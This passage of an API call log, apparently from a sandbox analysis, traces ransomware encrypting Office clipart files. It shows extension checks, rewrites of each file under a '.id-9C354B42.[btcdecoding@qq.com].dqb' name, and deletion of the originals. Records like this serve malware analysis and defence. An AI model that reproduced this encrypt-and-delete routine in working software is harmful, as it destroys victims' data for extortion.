lstrcmpiW (lpString1=".7z", lpString2="xsl") returned -1 [0049.006] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl") returned 78 [0049.006] lstrlenW (lpString=".dbf") returned 4 [0049.006] lstrcmpiW (lpString1=".dbf", lpString2=".xsl") returned -1 [0049.006] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl") returned 78 [0049.006] lstrlenW (lpString=".1cd") returned 4 [0049.006] lstrcmpiW (lpString1=".1cd", lpString2=".xsl") returned -1 [0049.006] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl") returned 78 [0049.006] lstrlenW (lpString=".jpg") returned 4 [0049.006] lstrcmpiW (lpString1=".jpg", lpString2=".xsl") returned -1 [0049.008] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0049.008] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0049.008] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00004_.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00004_.gif.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e4 [0049.008] GetLastError () returned 0x0 [0049.008] ReadFile (in: hFile=0x184, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x2340, lpOverlapped=0x0) returned 1 [0049.010] WriteFile (in: hFile=0x1e4, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0x2350, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0x2350, lpOverlapped=0x0) returned 1 [0049.011] ReadFile (in: hFile=0x184, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0049.011] WriteFile (in: hFile=0x1e4, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xec, lpOverlapped=0x0) returned 1 [0049.011] SetEndOfFile (hFile=0x1e4) returned 1 [0049.011] CloseHandle (hObject=0x1e4) returned 1 [0049.011] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0049.011] SetEndOfFile (hFile=0x184) returned 1 [0049.012] CloseHandle (hObject=0x184) returned 1 [0049.012] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00004_.GIF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0049.012] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00004_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00004_.gif")) returned 1 [0049.012] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00004_.GIF") returned 63 [0049.012] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00004_.GIF") returned 63 [0049.013] lstrlenW (lpString=".doc") returned 4 [0049.013] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0049.013] lstrlenW (lpString=".docx") returned 5 [0049.013] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0049.013] lstrlenW (lpString=".pdf") returned 4 [0049.013] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0049.013] lstrlenW (lpString=".xls") returned 4 [0049.013] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0049.013] lstrlenW (lpString=".xlsx") returned 5 [0049.013] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0049.013] lstrlenW (lpString=".ppt") returned 4 [0049.013] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0049.013] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00004_.GIF") returned 63 [0049.013] lstrlenW (lpString=".zip") returned 4 [0049.013] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0049.013] lstrlenW (lpString=".rar") returned 4 [0049.013] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0049.013] lstrlenW (lpString=".bz2") returned 4 [0049.013] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0049.013] lstrlenW (lpString=".7z") returned 3 [0049.013] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0049.013] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00004_.GIF") returned 63 [0049.013] lstrlenW (lpString=".dbf") returned 4 [0049.013] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0049.013] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00004_.GIF") returned 63 [0049.013] lstrlenW (lpString=".1cd") returned 4 [0049.013] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0049.013] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00004_.GIF") returned 63 [0049.013] lstrlenW (lpString=".jpg") returned 4 [0049.013] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0049.014] GetFileSizeEx (in: hFile=0x184, lpFileSize=0x2efff1c | out: lpFileSize=0x2efff1c*=7216) returned 1 [0049.014] CloseHandle (hObject=0x184) returned 1 [0049.014] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00011_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00011_.gif")) returned 0x20 [0049.014] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00011_.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00011_.gif.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0049.014] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00011_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00011_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0049.014] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0049.014] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0049.014] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00011_.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00011_.gif.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e4 [0049.014] GetLastError () returned 0x0 [0049.014] ReadFile (in: hFile=0x184, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x1c30, lpOverlapped=0x0) returned 1 [0049.016] WriteFile (in: hFile=0x1e4, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0x1c40, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0x1c40, lpOverlapped=0x0) returned 1 [0049.017] ReadFile (in: hFile=0x184, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0049.017] WriteFile (in: hFile=0x1e4, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xec, lpOverlapped=0x0) returned 1 [0049.017] SetEndOfFile (hFile=0x1e4) returned 1 [0049.017] CloseHandle (hObject=0x1e4) returned 1 [0049.017] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0049.017] SetEndOfFile (hFile=0x184) returned 1 [0049.018] CloseHandle (hObject=0x184) returned 1 [0049.020] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00011_.GIF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0049.020] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00011_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00011_.gif")) returned 1 [0049.020] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00011_.GIF") returned 63 [0049.020] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00011_.GIF") returned 63 [0049.020] lstrlenW (lpString=".doc") returned 4 [0049.021] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0049.021] lstrlenW (lpString=".docx") returned 5 [0049.021] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0049.021] lstrlenW (lpString=".pdf") returned 4 [0049.021] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0049.021] lstrlenW (lpString=".xls") returned 4 [0049.021] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0049.021] lstrlenW (lpString=".xlsx") returned 5 [0049.021] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0049.021] lstrlenW (lpString=".ppt") returned 4 [0049.021] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0049.021] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00011_.GIF") returned 63 [0049.021] lstrlenW (lpString=".zip") returned 4 [0049.021] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0049.021] lstrlenW (lpString=".rar") returned 4 [0049.021] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0049.021] lstrlenW (lpString=".bz2") returned 4 [0049.021] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0049.021] lstrlenW (lpString=".7z") returned 3 [0049.021] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0049.021] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00011_.GIF") returned 63 [0049.021] lstrlenW (lpString=".dbf") returned 4 [0049.021] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0049.021] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00011_.GIF") returned 63 [0049.021] lstrlenW (lpString=".1cd") returned 4 [0049.021] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0049.021] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00011_.GIF") returned 63 [0049.021] lstrlenW (lpString=".jpg") returned 4 [0049.021] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0050.422] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0050.477] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0050.477] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00021_.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00021_.gif.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0050.499] GetLastError () returned 0x0 [0050.499] ReadFile (in: hFile=0x178, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x3a19, lpOverlapped=0x0) returned 1 [0050.503] WriteFile (in: hFile=0x160, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0x3a20, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0x3a20, lpOverlapped=0x0) returned 1 [0050.504] ReadFile (in: hFile=0x178, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0050.504] WriteFile (in: hFile=0x160, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xec, lpOverlapped=0x0) returned 1 [0050.504] SetEndOfFile (hFile=0x160) returned 1 [0050.504] CloseHandle (hObject=0x160) returned 1 [0050.504] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0050.504] SetEndOfFile (hFile=0x178) returned 1 [0050.505] CloseHandle (hObject=0x178) returned 1 [0050.505] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00021_.GIF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0050.506] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00021_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00021_.gif")) returned 1 [0050.506] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00021_.GIF") returned 63 [0050.506] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00021_.GIF") returned 63 [0050.506] lstrlenW (lpString=".doc") returned 4 [0050.506] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0050.506] lstrlenW (lpString=".docx") returned 5 [0050.506] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0050.506] lstrlenW (lpString=".pdf") returned 4 [0050.506] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0050.506] lstrlenW (lpString=".xls") returned 4 [0050.506] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0050.506] lstrlenW (lpString=".xlsx") returned 5 [0050.506] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0050.506] lstrlenW (lpString=".ppt") returned 4 [0050.506] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0050.506] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00021_.GIF") returned 63 [0050.506] lstrlenW (lpString=".zip") returned 4 [0050.506] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0050.506] lstrlenW (lpString=".rar") returned 4 [0050.506] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0050.506] lstrlenW (lpString=".bz2") returned 4 [0050.506] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0050.506] lstrlenW (lpString=".7z") returned 3 [0050.507] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0050.507] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00021_.GIF") returned 63 [0050.507] lstrlenW (lpString=".dbf") returned 4 [0050.507] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0050.507] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00021_.GIF") returned 63 [0050.507] lstrlenW (lpString=".1cd") returned 4 [0050.507] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0050.507] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00021_.GIF") returned 63 [0050.507] lstrlenW (lpString=".jpg") returned 4 [0050.507] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0050.507] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2efff1c | out: lpFileSize=0x2efff1c*=3484) returned 1 [0050.507] CloseHandle (hObject=0x178) returned 1 [0050.507] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00120_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00120_.gif")) returned 0x20 [0050.507] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00120_.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00120_.gif.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0050.507] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00120_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00120_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0050.507] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0050.507] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0050.507] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00120_.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00120_.gif.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0050.508] GetLastError () returned 0x0 [0050.508] ReadFile (in: hFile=0x178, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0xd9c, lpOverlapped=0x0) returned 1 [0050.509] WriteFile (in: hFile=0x160, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xda0, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xda0, lpOverlapped=0x0) returned 1 [0050.510] ReadFile (in: hFile=0x178, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0050.510] WriteFile (in: hFile=0x160, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xec, lpOverlapped=0x0) returned 1 [0050.510] SetEndOfFile (hFile=0x160) returned 1 [0050.510] CloseHandle (hObject=0x160) returned 1 [0050.510] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0050.510] SetEndOfFile (hFile=0x178) returned 1 [0050.511] CloseHandle (hObject=0x178) returned 1 [0050.511] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00120_.GIF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0050.511] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00120_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00120_.gif")) returned 1 [0050.512] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00120_.GIF") returned 63 [0050.512] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00120_.GIF") returned 63 [0050.512] lstrlenW (lpString=".doc") returned 4 [0050.512] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0050.512] lstrlenW (lpString=".docx") returned 5 [0050.512] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0050.512] lstrlenW (lpString=".pdf") returned 4 [0050.512] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0050.512] lstrlenW (lpString=".xls") returned 4 [0050.512] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0050.512] lstrlenW (lpString=".xlsx") returned 5 [0050.512] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0050.512] lstrlenW (lpString=".ppt") returned 4 [0050.512] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0050.512] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00120_.GIF") returned 63 [0050.512] lstrlenW (lpString=".zip") returned 4 [0050.512] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0050.512] lstrlenW (lpString=".rar") returned 4 [0050.512] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0050.512] lstrlenW (lpString=".bz2") returned 4 [0050.512] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0050.512] lstrlenW (lpString=".7z") returned 3 [0050.512] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0050.512] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00120_.GIF") returned 63 [0050.512] lstrlenW (lpString=".dbf") returned 4 [0050.512] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0050.512] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00120_.GIF") returned 63 [0050.512] lstrlenW (lpString=".1cd") returned 4 [0050.512] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0050.512] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00120_.GIF") returned 63 [0050.512] lstrlenW (lpString=".jpg") returned 4 [0050.512] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0050.513] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0050.513] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0050.513] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00126_.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00126_.gif.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0050.513] GetLastError () returned 0x0 [0050.513] ReadFile (in: hFile=0x178, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0xc44, lpOverlapped=0x0) returned 1 [0050.514] WriteFile (in: hFile=0x160, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xc50, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xc50, lpOverlapped=0x0) returned 1 [0050.515] ReadFile (in: hFile=0x178, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0050.515] WriteFile (in: hFile=0x160, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xec, lpOverlapped=0x0) returned 1 [0050.515] SetEndOfFile (hFile=0x160) returned 1 [0050.515] CloseHandle (hObject=0x160) returned 1 [0050.516] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0050.516] SetEndOfFile (hFile=0x178) returned 1 [0050.516] CloseHandle (hObject=0x178) returned 1 [0050.516] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00126_.GIF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0050.517] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00126_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00126_.gif")) returned 1 [0050.517] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00126_.GIF") returned 63 [0050.517] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00126_.GIF") returned 63 [0050.517] lstrlenW (lpString=".doc") returned 4 [0050.517] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0050.517] lstrlenW (lpString=".docx") returned 5 [0050.517] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0050.517] lstrlenW (lpString=".pdf") returned 4 [0050.517] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0050.517] lstrlenW (lpString=".xls") returned 4 [0050.517] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0050.517] lstrlenW (lpString=".xlsx") returned 5 [0050.517] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0050.517] lstrlenW (lpString=".ppt") returned 4 [0050.517] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0050.517] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00126_.GIF") returned 63 [0050.517] lstrlenW (lpString=".zip") returned 4 [0050.517] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0050.517] lstrlenW (lpString=".rar") returned 4 [0050.517] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0050.517] lstrlenW (lpString=".bz2") returned 4 [0050.517] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0050.517] lstrlenW (lpString=".7z") returned 3 [0050.518] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0050.518] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00126_.GIF") returned 63 [0050.518] lstrlenW (lpString=".dbf") returned 4 [0050.518] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 